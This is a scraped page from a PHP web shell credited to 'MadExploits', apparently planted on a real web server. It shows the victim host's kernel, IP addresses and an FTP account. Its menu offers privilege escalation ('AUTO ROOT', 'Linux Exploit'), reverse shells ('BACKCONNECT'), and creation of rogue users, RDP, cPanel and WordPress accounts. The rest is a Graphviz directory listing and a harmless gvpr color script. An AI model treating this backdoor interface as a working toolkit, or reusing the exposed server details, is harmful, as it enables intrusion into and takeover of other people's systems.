Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
graphviz /
gvpr /
[ HOME SHELL ]
Name
Size
Permission
Action
addedges
291
B
-rw-r--r--
addranks
830
B
-rw-r--r--
addrings
1.29
KB
-rw-r--r--
anon
422
B
-rw-r--r--
attr
151
B
-rw-r--r--
bb
997
B
-rw-r--r--
bbox
532
B
-rw-r--r--
binduce
1.14
KB
-rw-r--r--
bipart
455
B
-rw-r--r--
chkclusters
532
B
-rw-r--r--
chkedges
916
B
-rw-r--r--
cliptree
178
B
-rw-r--r--
col
601
B
-rw-r--r--
collapse
469
B
-rw-r--r--
color
1.41
KB
-rw-r--r--
cycle
560
B
-rw-r--r--
dechain
264
B
-rw-r--r--
deghist
351
B
-rw-r--r--
deledges
116
B
-rw-r--r--
delmulti
397
B
-rw-r--r--
delnodes
249
B
-rw-r--r--
depath
547
B
-rw-r--r--
dijkstra
647
B
-rw-r--r--
flatten
88
B
-rw-r--r--
get-layers-list
277
B
-rw-r--r--
group
791
B
-rw-r--r--
histogram
319
B
-rw-r--r--
indent
378
B
-rw-r--r--
knbhd
1.2
KB
-rw-r--r--
maxdeg
307
B
-rw-r--r--
path
449
B
-rw-r--r--
rotate
1.17
KB
-rw-r--r--
scale
1.12
KB
-rw-r--r--
scalexy
1.1
KB
-rw-r--r--
span
139
B
-rw-r--r--
topon
429
B
-rw-r--r--
treetoclust
988
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : color
/* color edges based on normalized length alpha. * If we have lim[i-1] <= alpha <= lim[i], the color * is linearly interpolated between color[i-1] and color[i]. * Edges already having a color attribute are left unchanged. */ BEGIN { double lens [edge_t]; double maxlen, len, minlen=1.7976931348623157e+308; double alpha, x0, y0, x1, y1; double h0, s0, v0; int i; int ncolors; /* number of colors: ncolors >= 2 */ /* start of color i. * lim[0]=0 < lim[1] < ... < lim[ncolors-1]=1 */ double lim[int]; /* HSV values for color i */ double h[int]; double s[int]; double v[int]; /* simple default */ ncolors = 2; lim[0] = 0; lim[1] = 1; h[0] = 0; h[1] = 0.67; s[0] = 1; s[1] = 1; v[0] = 1; v[1] = 1; } E{ sscanf ($.tail.pos, "%f,%f", &x0, &y0); sscanf ($.head.pos, "%f,%f", &x1, &y1); len = sqrt ((x0-x1)*(x0-x1) + (y0-y1)*(y0-y1)); lens[$] = len; if (len > maxlen) maxlen = len; if (len < minlen) minlen = len; } BEG_G { if (!isAttr($,"E","color")) setDflt($,"E","color",""); } E{ if ($.color != "") return; alpha = (lens[$]-minlen)/(maxlen-minlen); for (i = 1; i < ncolors; i++) { if (alpha < lim[i]) break; } alpha = (alpha - lim[i-1])/(lim[i] - lim[i-1]); h0 = (1-alpha)*h[i-1] + alpha*h[i]; s0 = (1-alpha)*s[i-1] + alpha*s[i]; v0 = (1-alpha)*v[i-1] + alpha*v[i]; $.color = sprintf ("%.02f %.02f %.02f", h0, s0, v0); }
Close